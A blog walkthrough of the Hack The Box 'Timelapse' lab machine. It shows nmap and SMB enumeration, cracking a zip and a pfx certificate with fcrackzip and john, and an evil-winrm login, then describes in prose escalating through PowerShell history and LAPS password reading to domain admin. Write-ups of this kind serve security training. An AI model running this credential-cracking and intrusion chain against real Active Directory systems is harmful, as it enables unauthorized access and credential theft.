HTB : Timelapse

Network Enumeration

To begin our exploration of the network, let’s initiate an nmap scan in order to identify all open ports.

└─$ sudo nmap -p-   
[sudo] password for kali: 
Starting Nmap 7.93 ( ) at 2023-03-20 09:07 EDT
Nmap scan report for
Host is up (0.0057s latency).
Not shown: 65518 filtered tcp ports (no-response)
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5986/tcp  open  wsmans
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49693/tcp open  unknown

To gather more information about the network, we can use a detailed nmap scan.

└─$ sudo nmap -sC -sV -O -p 53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49696,62656
[sudo] password for kali: 
Starting Nmap 7.93 ( ) at 2023-03-20 09:50 EDT
Nmap scan report for timelapse.htb (
Host is up (0.0058s latency).

53/tcp    open     domain            Simple DNS Plus
88/tcp    open     kerberos-sec      Microsoft Windows Kerberos (server time: 2023-03-20 21:53:00Z)
135/tcp   open     msrpc             Microsoft Windows RPC
139/tcp   open     netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open     ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open     ldapssl?
3268/tcp  open     ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open     globalcatLDAPssl?
5986/tcp  open     ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2023-03-20T21:54:33+00:00; +8h02m48s from scanner time.
| tls-alpn: 
|_  http/1.1
|_http-title: Not Found
9389/tcp  open     mc-nmf            .NET Message Framing
49667/tcp open     msrpc             Microsoft Windows RPC
49673/tcp open     ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open     msrpc             Microsoft Windows RPC
49696/tcp filtered unknown
62656/tcp filtered unknown
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8h02m47s, deviation: 0s, median: 8h02m47s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-03-20T21:53:53
|_  start_date: N/A

Add the domain name found from the nmap scan to /etc/hosts  timelapse.htb dc01.timelapse.htb

SMB Enumeration

SMB null sessions are a type of network connection that allows unauthenticated access to information on a Windows-based computer. They can be used by attackers to gather sensitive information, but can be restricted or disabled to improve system security.

Use smbmap to check for null sessions.

└─$ smbmap -u "" -p "" -P 445 -H 
[+] IP:      Name: timelapse.htb 

None found, let’s try with the anonymous permissions.

└─$ smbmap -u "anonymous" -p "" -P 445 -H 
[+] Guest session       IP:  Name: timelapse.htb                                     
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Shares                                                  READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 

Use the recursive option in smbclient to list out all files of the replication folder.

└─$ smbclient -U 'anonymous' --no-pass -c 'recurse;ls' //
  .                                   D        0  Mon Oct 25 11:39:15 2021
  ..                                  D        0  Mon Oct 25 11:39:15 2021
  Dev                                 D        0  Mon Oct 25 15:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 11:48:42 2021

  .                                   D        0  Mon Oct 25 15:40:06 2021
  ..                                  D        0  Mon Oct 25 15:40:06 2021                    A     2611  Mon Oct 25 11:46:42 2021

  .                                   D        0  Mon Oct 25 11:48:42 2021
  ..                                  D        0  Mon Oct 25 11:48:42 2021
  LAPS.x64.msi                        A  1118208  Mon Oct 25 10:57:50 2021
  LAPS_Datasheet.docx                 A   104422  Mon Oct 25 10:57:46 2021
  LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 10:57:40 2021
  LAPS_TechnicalSpecification.docx      A    72683  Mon Oct 25 10:57:44 2021

There are some laps file but lets investigate the file as it looks interesting, download it to the local machine. It is password protected so we need to crack it.

└─$ fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt 
found file 'legacyy_dev_auth.pfx', (size cp/uc   2405/  2555, flags 9, chk 72aa)
checking pw udei9Qui                                

PASSWORD FOUND!!!!: pw == supremelegacy

Unzipping the file will give us a pfx file.

Tried converting the file but it requires a password.

└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key
Enter Import Password:
Mac verify error: invalid password?

We need to extract the pem and key file from the pfx file. However it is locked. Follow the commands below to crack it and extract the necessary files.

pfx2john legacyy_dev_auth.pfx | tee legacyy_dev_auth.pfx.hash

john --wordlist=/usr/share/wordlists/rockyou.txt legacyy_dev_auth.pfx.hash

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc

openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key

openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt

You will get two files, the .crt and .key file.

We can use these files to gain access to shell with evil-winrm.

└─$ evil-winrm -i -S -c legacyy_dev_auth.crt -k legacyy_dev_auth.key 

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github:

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami

We get a shell for the legacyy user.

We can find the first flag is the desktop of the user.

*Evil-WinRM* PS C:\Users\legacyy\desktop> ls

    Directory: C:\Users\legacyy\desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        3/21/2023   9:25 AM             34 user.txt

Let’s upload winPeas to find for any interesting files.

Looks like can we can view the powershell history file.

We find a password and user.

We are able to get a shell.

Checking privileges and groups we can find an interesting group.

We can see that the user belongs to the LAPS readers group.

LAPS is a Microsoft tool that manages and secures local administrator passwords for Windows computers. It periodically generates and changes passwords for the built-in local administrator account and stores the information in Active Directory to prevent unauthorized access and minimize the impact of credential theft. It’s a free tool that can be downloaded and installed on domain controllers.

We can read the password in plain text.

We can login as the admin to gain the shell.

The final flag will be in the trx user’s desktop.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Comments (



Create a website or blog at

%d bloggers like this: